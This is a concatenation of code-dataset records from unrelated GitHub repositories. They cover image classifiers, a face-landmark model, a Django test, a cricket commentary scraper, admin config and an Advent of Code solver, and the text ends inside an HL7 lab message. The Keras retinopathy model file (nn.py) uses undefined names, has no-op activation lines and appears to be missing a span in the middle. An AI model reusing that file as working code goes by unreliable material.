\"cnn_filter32.h5\"\n    cnn = load_model(filename)\n    cnn.evaluate(test_data, test_label)\n\n","repo_name":"JEONJinah/Kang","sub_path":"cnn_mnist.py","file_name":"cnn_mnist.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"2572917253","text":"import tensorflow as tf\nfrom nets.PFLD import PFLDInference\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport time\n\n\nclass FaceKeyPointsNet(object):\n    _defaults = {\n        \"model_path\": \"./model_data/model.h5\", # path to the model weights\n        \"input_shape\": [112, 112, 3], # input image size\n    }\n    \n    @classmethod\n    def get_defaults(cls, n):\n        if n in cls._defaults:\n            return cls._defaults[n]\n        else:\n            return \"Unrecognized attribute name '\" + n + \"'\"\n    \n    def __init__(self, **kwargs):\n        self.__dict__.update(self._defaults)\n        for name, value in kwargs.items():\n            setattr(self, name, value)\n        \n        # use the GPU, with memory growth enabled per device\n        gpus = tf.config.experimental.list_physical_devices(device_type='GPU')\n        for gpu in gpus:\n            tf.config.experimental.set_memory_growth(gpu, True)\n        self.generate()\n        print(\"Model loaded successfully!!!\")\n    \n    def generate(self):\n        self.model = PFLDInference(self.input_shape, is_train=False)\n        self.model.load_weights(self.model_path, by_name=True)\n    \n    def detect_image(self, img):\n        \n        img_copy = np.copy(img)\n        img_copy_h, img_copy_w = img_copy.shape[:2]\n        \n        img = cv2.resize(img, (self.input_shape[0], self.input_shape[1]))\n        img_rgb = cv2.cvtColor(img_copy,cv2.COLOR_BGR2RGB)\n        img_data = np.expand_dims(np.array(img)/255.0, 0)\n        landmark = self.model.predict(img_data)[0] * self.input_shape[0]\n        landmark[0::2] = landmark[0::2] * img_copy_w / self.input_shape[0]\n        landmark[1::2] = 
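Both the training and test labels above go through tf.keras.utils.to_categorical, which one-hot encodes integer classes so they line up with the 10-way softmax output. A NumPy equivalent that makes the shape change explicit:

import numpy as np

def one_hot(labels, num_classes):
    # (N,) integer labels -> (N, num_classes) rows of zeros with a single 1.
    labels = np.asarray(labels)
    out = np.zeros((len(labels), num_classes), dtype=np.float32)
    out[np.arange(len(labels)), labels] = 1.0
    return out

# one_hot([3, 0], 5) -> [[0,0,0,1,0], [1,0,0,0,0]]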
landmark[1::2] * img_copy_h / self.input_shape[0]\n self.show(img_rgb, landmark)\n \n def show(self, img, landmark):\n plt.imshow(img)\n for i in range(0, len(landmark),2):\n plt.scatter(landmark[i], landmark[i+1], s=20, marker='.', c='m')\n plt.show()\n \n def fps(self, img, n=100):\n start = time.time()\n img = np.array(img)\n img = cv2.resize(img, (self.input_shape[0], self.input_shape[1]))\n img_data = np.expand_dims(np.array(img)/255.0, 0)\n for _ in range(n):\n landmark = self.model.predict(img_data)[0]\n end = time.time()\n avg_time = (end - start)/n\n return avg_time\n \n","repo_name":"hao-ux/PFLD-tf2","sub_path":"PDLD.py","file_name":"PDLD.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"558494539","text":"from django.test import TestCase\nfrom labelit.models import Document, Dataset, DocumentSequence\nfrom labelit.serializers import DocumentSequenceSerializer\n\n\nclass DocumentSequenceSerializerTests(TestCase):\n def setUp(self):\n self.dataset = Dataset.objects.create(name=\"IMDB reviews\")\n self.document_sequence = DocumentSequence.objects.create(\n dataset=self.dataset, num_documents=2\n )\n self.document1 = Document.objects.create(\n text=\"The movie was so wishy-washy I could do my laundry with it\",\n dataset=self.dataset,\n document_sequence=self.document_sequence,\n sequence_index=0,\n )\n self.document2 = Document.objects.create(\n text=\"If my island had a TV, I would bring that one movie with me\",\n dataset=self.dataset,\n document_sequence=self.document_sequence,\n sequence_index=1,\n )\n self.serializer = DocumentSequenceSerializer(instance=self.document_sequence)\n\n def test_contains_expected_fields_and_specific_fields_and_resourcetype(self):\n self.assertEqual(\n set(self.serializer.data.keys()), set([\"dataset\", \"num_documents\"])\n )\n","repo_name":"voicelab-org/labelit","sub_path":"backend/src/labelit/tests/serializers/test_document_sequence_serializer.py","file_name":"test_document_sequence_serializer.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"83"} +{"seq_id":"28474184267","text":"# Databricks notebook source\nmaster_df = spark.read.csv('/dbfs/FileStore/master_df.csv', header = True, inferSchema = True)\n\n# COMMAND ----------\n\nimport re\nimport requests\nimport json\n\n## Input game url, innings number and over number -> outputs dictionary of raw ball by ball information ##\ndef get_raw_over(url, innings, inningsOver):\n \n # grab matchId and seriesId\n url_match = re.match(\"https://www.espncricinfo.com/series/([\\w\\d-]+)-(\\d+)/([\\w\\d-]+)-(\\d+)/ball-by-ball-commentary\", url)\n seriesId, matchId = url_match.group(2), url_match.group(4)\n\n # GET text\n request = f\"https://hs-consumer-api.espncricinfo.com/v1/pages/match/comments?seriesId={seriesId}&matchId={matchId}&inningNumber={innings}&commentType=ALL&fromInningOver={inningsOver}\"\n payload, headers = {}, {} \n response = requests.request(\"GET\", request, headers=headers, data=payload)\n raw_over = json.loads(response.text)\n\n return raw_over[\"comments\"][0]\n\n## Cleans an over of commentary data -> outputs string of ball by ball info for the over ##\ndef clean_over(over):\n \n # Initial clean + reverse order\n over = over['comments']\n Output = ''\n if not over: return Output\n current_over = over[0]['overNumber']\n over.reverse()\n \n # Determine who is batting and save as first line of 
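The PFLD code above stores landmarks as an interleaved flat array, x coordinates at even indices and y at odd ones, and rescales them from the 112x112 network input back to the original image size. A standalone sketch of that interleaved rescaling, taking coordinates already expressed in input-pixel units:

import numpy as np

def rescale_landmarks(landmark, input_size, img_w, img_h):
    landmark = np.asarray(landmark, dtype=np.float64).copy()
    landmark[0::2] *= img_w / input_size   # x coordinates
    landmark[1::2] *= img_h / input_size   # y coordinates
    return landmark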
output \n    if current_over == 1:\n        batting_team = over[-1]['over']['team']['longName']\n        Output += f'{batting_team} Innings: \\n \\n'\n\n    for i in range(len(over)): \n        \n        # Remove double erroneous previous overs from raw data\n        if current_over != over[i]['overNumber']: continue\n\n        # ball information\n        ball_number = over[i]['ballNumber']\n        bowl_to_bat = over[i]['title']\n        event = ''\n        runs = over[i]['totalRuns']\n\n        # Special events such as wickets, fours and sixes \n        event_dict = {'isFour': 'Four!', 'isSix': 'Six!', 'isWicket': 'Wicket!', 'legbyes': 'legbyes', 'wides': 'Wide.', 'noballs': 'No Ball.'}\n        for key, item in event_dict.items():\n            if over[i][key]:\n                event = item\n\n        Output += f'{current_over}.{ball_number} {bowl_to_bat}: {event} {runs} run(s) \\n'\n\n        # Commentary prior to, during and after ball #\n        comment_elements = ['commentPreTextItems', 'commentTextItems', 'commentPostTextItems']\n        comments = ''\n        for x in comment_elements:\n            try:\n                comments += f\"{over[i][x][0]['html']}. \"\n            except TypeError:\n                continue\n        if comments: \n            Output += f'{comments} \\n'\n\n    return Output \n\n\n## Input url -> outputs list of game commentary ##\ndef get_game(url, clean = True):\n\n    game = []\n\n    for innings_number in range(1,3):\n        for over in range(1,51):\n            over = get_raw_over(url, innings_number, over)\n            if clean:\n                over = clean_over(over)\n            game.append(over)\n\n    return game\n\n# COMMAND ----------\n\nurl_list = master_df.select(\"ball_by_ball_commentary_url\").rdd.flatMap(lambda x: x).collect()\nsample_url = url_list[0]\n\n# COMMAND ----------\n\nraw_game = get_game(sample_url, clean = False)\nfirst_over = get_raw_over(sample_url,1,1)\nprint(first_over)\n\n# COMMAND ----------\n\nover_df = spark.createDataFrame(first_over.items(), ['key', 'value'])\nover_df.show()","repo_name":"chrisdixson/super-predictor","sub_path":"03 - commentary_data.py","file_name":"03 - commentary_data.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"30904965031","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division, print_function\nimport time\nimport os\nimport numpy as np\nimport pandas as pd\n\nimport data\n\nimport keras\nimport keras.layers\nimport keras.backend as K\nfrom keras.optimizers import SGD\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten, Input, GlobalAveragePooling2D, BatchNormalization, LeakyReLU, AveragePooling2D\nfrom keras.preprocessing import image\nfrom keras.utils.np_utils import to_categorical\nfrom keras.regularizers import l2 \nfrom keras.callbacks import History,TensorBoard,EarlyStopping,Callback,ModelCheckpoint\nfrom keras.utils.vis_utils import plot_model\nfrom sklearn.model_selection import train_test_split\n\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.5\nset_session(tf.Session(config = config))\n\n# channel standard deviations\nSTD = np.array([70.53946096, 51.71475228, 43.03428563], dtype=np.float32)\n\n# channel means\nMEAN = np.array([108.64628601, 75.86886597, 54.34005737], dtype=np.float32)\n\n#generator\ntrain_gen = image.ImageDataGenerator(\n    featurewise_center=True,\n    featurewise_std_normalization=True)\ntest_gen = image.ImageDataGenerator(\n    featurewise_center=True,\n    featurewise_std_normalization=True)\n\n# two helper functions to compute sensitivity and specificity\n\ndef sensi(y_true, y_pred):\n\n    y_pred = 
tf.convert_to_tensor(y_pred, np.float32)#newly added \n y_true = tf.convert_to_tensor(y_true, np.float32)\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n\n tp = K.sum(y_pos * y_pred_pos)\n tn = K.sum(y_neg * y_pred_neg)\n\n fp = K.sum(y_neg * y_pred_pos)\n fn = K.sum(y_pos * y_pred_neg)\n\n return tp / (tp + fn + K.epsilon())\n\ndef speci(y_true, y_pred):\n y_pred = tf.convert_to_tensor(y_pred, np.float32)\n y_true = tf.convert_to_tensor(y_true, np.float32)\n\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n\n tp = K.sum(y_pos * y_pred_pos)\n tn = K.sum(y_neg * y_pred_neg)\n\n fp = K.sum(y_neg * y_pred_pos)\n fn = K.sum(y_pos * y_pred_neg)\n\n return tn / (tn + fp + K.epsilon()) \n\ndef get_images(files): #这和data里写的不是差不多么? 下面还删了?smg???\n images = []\n for i in range(len(files)):\n img = image.load_img(files[i])\n tmp = image.img_to_array(img)\n #np.subtract(tmp, MEAN[np.newaxis, np.newaxis, :], out=tmp)\n #np.divide(tmp, STD[np.newaxis, np.newaxis, :], out=tmp)\n #tmp = data.augment_color(tmp, sigma=0.25)\n images.append(tmp)\n\n return images\n\ndef get_labels(labels):\n targets = to_categorical(labels, 5)\n return targets\n\ndef get_testset(files,labels):\n images = get_images(files)\n targets = get_labels(labels)\n return np.array(images), np.array(targets)\n\ndef get_trainset(files, labels):\n images = get_images(files)\n #print(np.array(images).shape)\n targets = get_labels(labels)\n return np.array(images), np.array(targets)\n\ndef create_net():\n net = NetModel()\n return net\n\nclass NetModel():\n def __init__(self):\n self.debug = 1\n self.comment_build()\n\n def identity_block(input_tensor, kernel_size, filters, stage, block):\n nb_filter1, nb_filter2, nb_filter3 = filters\n if K.image_dim_ordering() == 'tf':\n bn_axis = 3\n else:\n bn_axis = 1\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = Conv2D(nb_filter1, 1, 1, name=conv_name_base + '2a')(input_tensor)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x)\n x = Activation('relu')(x)\n\n x = Conv2D(nb_filter2, kernel_size, kernel_size,\n padding='same', name=conv_name_base + '2b')(x)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x)\n x = Activation('relu')(x)\n\n x = Conv2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x)\n\n x = merge([x, input_tensor], mode='sum')\n x = Activation('relu')(x)\n return x\n\n\n def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2)):\n nb_filter1, nb_filter2, nb_filter3 = filters\n if K.image_dim_ordering() == 'tf':\n bn_axis = 3\n else:\n bn_axis = 1\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = Conv2D(nb_filter1, 1, 1, subsample=strides,\n name=conv_name_base + '2a')(input_tensor)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x)\n x = Activation('relu')(x)\n\n x = Conv2D(nb_filter2, kernel_size, kernel_size, padding='same',\n name=conv_name_base + '2b')(x)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x)\n x = Activation('relu')(x)\n\n x = Conv2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x)\n x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x)\n\n shortcut = Conv2D(nb_filter3, 1, 1, 
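sensi and speci above are the standard sensitivity (true-positive rate) and specificity (true-negative rate), built from rounded 0/1 predictions. The same arithmetic in plain NumPy, handy for checking the Keras versions on small arrays:

import numpy as np

def sensitivity_specificity(y_true, y_pred, eps=1e-7):
    y_true = np.asarray(y_true, dtype=np.float32)
    y_pred = np.clip(np.round(np.asarray(y_pred, dtype=np.float32)), 0, 1)
    tp = np.sum(y_true * y_pred)              # positives correctly flagged
    tn = np.sum((1 - y_true) * (1 - y_pred))  # negatives correctly flagged
    fp = np.sum((1 - y_true) * y_pred)
    fn = np.sum(y_true * (1 - y_pred))
    return tp / (tp + fn + eps), tn / (tn + fp + eps)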
subsample=strides,\n name=conv_name_base + '1')(input_tensor)\n shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1')(shortcut)\n\n x = merge([x, shortcut], mode='sum')\n x = Activation('relu')(x)\n return x\n\n def build_model(self):\n img_input = Input(shape=(512, 512, 3))\n\n x = ZeroPadding2D((3, 3))(img_input)\n x = Conv2D(64, 7, 7, subsample=(2, 2), name='conv1')(x)\n x = BatchNormalization(axis=bn_axis, name='bn_conv1')(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((3, 3), strides=(2, 2))(x)\n\n x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1))\n x = identity_block(x, 3, [64, 64, 256], stage=2, block='b')\n x = identity_block(x, 3, [64, 64, 256], stage=2, block='c')\n\n x = conv_block(x, 3, [128, 128, 512], stage=3, block='a')\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='b')\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='c')\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='d')\n\n x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e')\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f')\n\n x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a')\n x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b')\n x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c')\n\n x = AveragePooling2D((7, 7), name='avg_pool')(x)\n\n x = Flatten()(x)\n # x = Dense(1024, activation='relu', name='fc1000')(x)\n x = Dense(5, activation='softmax', name='fc5')(x)\n\n self.model = Model(inputs, x)\n\n def comment_build(self):\n self.model = Sequential()\n\n self.model.add(Conv2D(32, (3,3), input_shape=(512, 512, 3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same',name='block1_conv1'))\n self.model.add(LeakyReLU(alpha=0.01))\n #self.model.add(Conv2D(32, (3,3), input_shape=(4, 256, 256, 3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), activation=LeakyReLU(alpha=0.01), padding='same', name='block1_conv1'))\n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block1_pool1'))\n self.model.add(Conv2D(32, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block1_conv2'))\n self.model.add(LeakyReLU(alpha=0.01))\n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block1_pool2'))\n\n # Block 2\n self.model.add(Conv2D(64, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block2_conv1'))\n self.model.add(LeakyReLU(alpha=0.01))\n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block2_pool1'))\n self.model.add(Conv2D(64, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block2_conv2'))\n self.model.add(LeakyReLU(alpha=0.01))\n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block2_pool2'))\n\n # Block 3\n self.model.add(Conv2D(128, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block3_conv1'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block3_pool1'))\n self.model.add(Conv2D(128, (3,3), 
kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block3_conv2'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block3_pool2'))\n\n # Block 4\n self.model.add(Conv2D(256, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block4_conv1'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Conv2D(256, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block4_conv2'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Conv2D(256, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block4_conv3'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block4_pool2'))\n\n # Block 5\n self.model.add(Conv2D(512, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block5_conv1'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Conv2D(512, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block5_conv2'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Conv2D(512, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block5_conv3'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block5_pool2'))\n self.model.add(Dropout(0.5))\n\n self.model.add(Flatten(name='flatten'))\n self.model.add(Dense(1024))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Dropout(0.5))\n self.model.add(Dense(1024))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Dense(5, activation='softmax'))\n\n def abort_train_test_split(self, X, y, test=False):\n sss = StratifiedShuffleSplit(n_splits=150, test_size=0.2, random_state=23) #这个看不懂是smg?\n spl = sss.split(X, y)\n tr, te = next(iter(spl))\n X_train, y_train = X[tr], y[tr]\n X_valid, y_valid = X[te], y[te]\n\n return X_train, X_valid, y_train, y_valid\n\n def fine_tune(self, X, y):\n #X = np.array(X)\n #y = np.array(y)\n #X_train, X_valid, y_train, y_valid = self.train_test_split(X, y, 0.1)\n X, y = get_trainset(X, y)\n X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.2, random_state=11)\n #X_valid, y_valid = get_trainset(X_val, y_val)\n print(\"Fine_tune Start\")\n batch_size = 3 #本来是4\n train_gen.fit(X)\n test_gen.fit(X)\n if self.debug>0:\n print(X_valid.shape)\n print(y_valid.shape)\n print(len(y_valid))\n train_generator = train_gen.flow(X_train, y_train, batch_size=batch_size, shuffle=True)\n validate_generator = test_gen.flow(X_valid, y_valid, batch_size=batch_size, shuffle=True)\n lr = 0.1\n decay = 0.0001\n tb = TensorBoard(log_dir='logs', histogram_freq=5) #这个淘宝打不出来也很尴尬啊!用来打印train&test种的metrics的。会保存到logs文件夹里, 1个epoch打印5次activation&weight histograms\n hs = History()\n es = EarlyStopping(monitor='loss', min_delta=0.0008, patience=2, mode='min',verbose = 0)\n #检测loss 如果连续2轮的min(decrease) 都0:\n print(\"my_test starts, y is\")\n print(y)\n X_test, y_true = get_testset(X,y)\n if self.debug>0:\n print(y_true)\n y_pred = self.model.predict(X_test)\n print(\"sensitivity={}, specity={}\"\"\".format(sensi(y_true, y_pred),speci(y_true, y_pred)))\n \n def make_submission(self, files, names, weights, subm):\n self.model.load_weights(weights)\n X = get_testset(files)\n print('------load done------')\n y_prob = self.model.predict(X, batch_size=2)\n 
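fine_tune above wires featurewise-normalising generators to the training loop with History, TensorBoard and EarlyStopping callbacks. A pared-down sketch of that callback wiring, under the same Keras 2.x API this file imports; the thresholds mirror the ones used above and the weights path is a placeholder:

from keras.callbacks import EarlyStopping, History, ModelCheckpoint

def make_callbacks(weights_path="weights_best.h5"):
    # Stop once loss improves by less than min_delta for `patience`
    # consecutive epochs, as in fine_tune above.
    early = EarlyStopping(monitor="loss", min_delta=0.0008, patience=2, mode="min")
    # Keep only the best weights seen so far on the validation loss.
    check = ModelCheckpoint(weights_path, monitor="val_loss", save_best_only=True)
    return [early, check, History()]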
print('------predict done------')\n y_hat = np.argmax(y_prob, axis=1)\n y_dic = {'level':y_hat}\n sub = pd.DataFrame(y_dic)\n sub.insert(0, 'image', names)\n sub.to_csv(subm, index=False)\n print('-------done-------')\n\n\n \n\n\n\n\n\n\n\n\n\n\n","repo_name":"YeahHuang/DR-image-classification","sub_path":"nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":15754,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"28274023977","text":"import os\nfrom dotenv import load_dotenv\nfrom .utils.file_utils import check_folder\n\n# Load environment variables from .env file\nload_dotenv()\n\nclass Config():\n def __init__(self):\n self.ip = os.getenv('IP', \"127.0.0.1:7860\")\n self.is_auto_save = True\n self.is_auto_save = os.getenv('IS_AUTO_SAVE')\n save_name = os.getenv('WORK_DIR', \"templates\")\n outputs_name = os.getenv('OUTPUT_DIR', \"outputs\")\n\n #根目录\n self.project_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\n work_temp_dir = os.path.join(self.project_dir, save_name)\n check_folder(work_temp_dir)\n self.work_dir = work_temp_dir\n\n output_temp_dir = os.path.join(self.project_dir, outputs_name)\n check_folder(output_temp_dir)\n self.output_dir = output_temp_dir\n\n def set_is_auto_save(self, value: bool):\n self.is_auto_save = value\n \n def set_ip(self, value: str):\n self.ip = value\n\n def set_work_dir(self, folder_name: str):\n work_temp_dir = os.path.join(self.project_dir, folder_name)\n check_folder(work_temp_dir)\n\n self.work_dir = work_temp_dir\n\n def set_outputs_dir(self, folder_name: str):\n output_temp_dir = os.path.join(self.project_dir, folder_name)\n check_folder(output_temp_dir)\n\n self.output_dir = output_temp_dir\n\nconfig = Config()","repo_name":"varhuman/sd_styler","sub_path":"modules/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34515171144","text":"from copy import deepcopy\n\nfrom dal import autocomplete\nfrom django.contrib import admin\nfrom mezzanine.pages.models import RichTextPage\nfrom django.contrib import admin\nfrom django.utils import timezone\nfrom mezzanine.pages.admin import PageAdmin, PageAdminForm\n\nfrom derrida.outwork.models import Outwork\n\n\n# customize page admin fieldset for outwork\n# move description from metadata to main, since we are using it as excerpt\n# remove in menus and login required\noutwork_fieldsets = deepcopy(PageAdmin.fieldsets)\n# outwork_fieldsets[0][1]['fields'].insert(3, 'content')\n# outwork_fieldsets[0][1]['fields'].insert(3, ('description', 'gen_description'))\noutwork_fieldsets[0][1]['fields'].remove('in_menus')\noutwork_fieldsets[0][1]['fields'].extend(['author', 'orig_pubdate',\n ('description', 'gen_description'), 'content'])\noutwork_fieldsets[0][1]['fields'].remove('login_required')\noutwork_fieldsets[1][1]['fields'].remove(('description', 'gen_description'))\noutwork_fieldsets[1][1]['fields'].remove(('in_sitemap'))\n# use grappelli collapse logic, default open\noutwork_fieldsets[1][1]['classes'] = ('grp-collapse grp-open',)\n\n\nclass OutworkAdminForm(PageAdminForm):\n help_text = {\n 'description': '''Excerpt for display at the top of the page and\n in list view; also used as description in page metadata and\n for link previews.''',\n 'slug': ''' Outwork and site publication year will automatically be added.\n Should not be changed after an item is published.''',\n 'keywords': 
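make_submission above converts each row of softmax probabilities to a single class with np.argmax and writes an image/level CSV. The core of that step as a standalone helper:

import numpy as np
import pandas as pd

def write_submission(names, y_prob, path="submission.csv"):
    y_hat = np.argmax(y_prob, axis=1)   # most probable class per sample
    sub = pd.DataFrame({"level": y_hat})
    sub.insert(0, "image", names)       # image identifiers as first column
    sub.to_csv(path, index=False)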
'''Optional list of comma-separated keywords for inclusion\n in page metadata''',\n }\n class Meta:\n widgets = {\n 'author': autocomplete.ModelSelect2(\n url='people:person-autocomplete',\n attrs={'data-placeholder': 'Start typing a name to search...'}\n )\n }\n\n def __init__(self, *args, **kwargs):\n super(OutworkAdminForm, self).__init__(*args, **kwargs)\n # expand help text\n for field, help_text in self.help_text.items():\n self.fields[field].help_text += help_text\n self.fields['description'].label = 'Excerpt'\n self.fields['gen_description'].initial = False\n\n\nclass OutworkAdmin(PageAdmin):\n form = OutworkAdminForm\n fieldsets = outwork_fieldsets\n\n\npage_fieldsets = deepcopy(PageAdmin.fieldsets)\n# make sure content is included\npage_fieldsets[0][1]['fields'].append('content')\n# use grappelli collapse logic, default open\npage_fieldsets[1][1]['classes'] = ('grp-collapse grp-open',)\n\nclass LocalPageAdmin(PageAdmin):\n fieldsets = page_fieldsets\n\n\nadmin.site.register(Outwork, OutworkAdmin)\nadmin.site.unregister(RichTextPage)\nadmin.site.register(RichTextPage, LocalPageAdmin)\n","repo_name":"Princeton-CDH/derrida-django","sub_path":"derrida/outwork/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"63"} +{"seq_id":"26023562072","text":"#%%\ndef is_route_in_stack(route, stack):\n for r in stack:\n if len(r) == len(route) and all(a == b for a, b in zip(r, route)):\n return True\n return False\n\n\nwith open(\"./12_input.txt\", \"r\") as file:\n connections = [line.rstrip().split(\"-\") for line in file.readlines()]\n\nconnections\n\n#%%\nstack = [[\"start\"]]\npaths = []\n\nwhile len(stack) > 0:\n route = stack.pop()\n current_cave = route[-1]\n for connection in connections:\n if current_cave in connection:\n next_cave = (\n connection[1] if connection[0] == current_cave else connection[0]\n )\n if (next_cave.islower() and next_cave not in route) or (\n next_cave.isupper()\n ):\n new_route = route + [next_cave]\n if next_cave == \"end\":\n paths.append(new_route)\n elif not is_route_in_stack(new_route, stack):\n stack.append(new_route)\n\n\nanswer_part_one = len(paths)\nanswer_part_one\n\n#%%\nstack = [[\"start\"]]\npaths = []\n\nsmall_caves = set(\n [\n conn[0]\n for conn in connections\n if conn[0].islower() and conn[0] not in [\"start\", \"end\"]\n ]\n + [\n conn[1]\n for conn in connections\n if conn[1].islower() and conn[1] not in [\"start\", \"end\"]\n ]\n)\n\n# Not really fast... 
🥴\nwhile len(stack) > 0:\n route = stack.pop()\n current_cave = route[-1]\n for connection in connections:\n if current_cave in connection:\n next_cave = (\n connection[1] if connection[0] == current_cave else connection[0]\n )\n if next_cave == \"start\":\n continue\n\n small_cave_counts_greater_than_one = [\n route.count(c) for c in small_caves if route.count(c) > 1\n ]\n if (\n next_cave.islower()\n and (\n len(small_cave_counts_greater_than_one) == 0\n or (\n len(small_cave_counts_greater_than_one) == 1\n and max(small_cave_counts_greater_than_one) == 2\n )\n )\n ) or (next_cave.isupper()):\n new_route = route + [next_cave]\n if next_cave == \"end\":\n paths.append(new_route)\n elif not is_route_in_stack(new_route, stack):\n stack.append(new_route)\n\nanswer_part_two = len(paths)\nanswer_part_two\n","repo_name":"yveso/advent-of-code-2021","sub_path":"11-20/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15574821816","text":"# This part of the program assigns the ENTIRE HL7 v2.5.1 message to a variable called \"hl7\" to identify this as the whole message (as a string).\nhl7 = \"\"\"MSH|^~\\&|QLS^2.16.840.1.113883.3.165.2^ISO|QUEST WEST HILLS^05D0642827^CLIA|NV^2.16.840.1.114222.4.3.2.2.3.600.4^ISO|NVDOH^2.54.944.1.447329.0.2.400493^ISO|20220909040419.1651-0700||ORU^R01^ORU_R01|MET-ELRNV60-LV142381S-20220909-20220909 04:04:19.1651|P|2.5.1|||AL|AL|USA||||PHLabReport-Ack^^2.16.840.1.113883.9.11^ISO\nPID|1||104417^^^Banner Churchill Community Hospital&29D0539273&CLIA^MR^Banner Churchill Community Hospital&29D0539273&CLIA~12345678987^^^Banner Churchill Community Hospital&29D0539273&CLIA^PI^Banner Churchill Community 